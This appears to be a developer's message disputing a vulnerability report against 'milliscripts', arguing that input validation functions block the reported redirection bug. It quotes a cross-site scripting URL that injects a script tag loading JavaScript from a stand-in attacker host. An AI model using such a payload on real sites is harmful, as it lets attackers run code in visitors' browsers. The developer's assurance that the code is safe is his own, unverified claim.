Hello, I never read anything else from you. I checked the points you told me (bug in milliscripts redirection when checking $domainname for example), but they are not true. In /include/functions.php, *every* input is checked for validation. The functions are called: check_domain($dname) check_domain2($dname, $extension) check_string($string) verify_email($email check_forbidden($url1) No invalid input can reach the script, there is no possibility the an url like this causes any problem or security issue: http://www.server.net/red_14/register.php?do=register2&domainname=%22%3E%3Cscript%20src=http://serveratacker.com/script.js%3E%3C/script%3E&ext=somevaliddomain.net Please test all scripts in content with the included files, like functions.php. I don't know how you exactly test, but there can never be any problems like you told them. Please revise your security issue which never has been any. Best regards Alex
